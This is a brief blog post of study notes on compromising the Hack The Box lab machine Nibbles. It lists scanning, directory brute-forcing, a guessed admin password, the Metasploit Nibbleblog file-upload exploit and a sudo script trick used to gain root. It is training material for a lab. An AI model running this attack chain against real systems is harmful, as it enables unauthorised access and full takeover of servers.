TCM PEH Hacking Nibbles Notes

on under certs
1 minute read

HTB Nibbles

Recording strokes to derive methodology

nmap -A -T4 -p- 10.10.10.75
Noted port 22 open
Noted port 80 open
Noted Ubuntu OS


searchsploit apache 2.4
Visited 10.10.10.75:80 in browser
Viewed wappalyzer extension, noted Ubuntu
Viewed source
Noted comment pointing to nibble blog directory
Visited /nibbleblog
Noted more links
Viewed source
searchsploit nibbles
searchsploit nibble
Noted nibbleblog 3 result SQLi
Noted nibbleblog 4.0.3 Arb File Upload
msfconsole
search nibble
use exploit/multi/http/nibbleblog_file_upload
info
Noted that this allows AUTHENTICATED remote attacker to blahblahblah


dirbuster&
http://10.10.10.75:80
go faster
/usr/share/wordlist/dirbuster/medium
/nibbleblog
php
Start
Review tab
Visited /nibbleblog/admin.php
Logged in with Admin:nibbles
Visited Settings
Noted nibbleblog 4.0.3


In msfconsole
options
set password nibbles
set username admin
set rhosts 10.10.10.75
set targeturi nibbleblog
options
exploit
Noted session created
sysinfo
getuid
shell
pwd
cd /home
whoami
cd nibbler
ls -lha
history
cat .bash_history
sudo -l
mkdir personal
cd personal
mkdir stuff
pwd
echo “bash -i” > monitor.sh
chmod +x monitor.sh
sudo monitor.sh
whoami
Noted nibbler, still
sudo /home/nibbler/personal/stuff/monitor.sh
whoami
Noted root

certs, pwned
comments powered by Disqus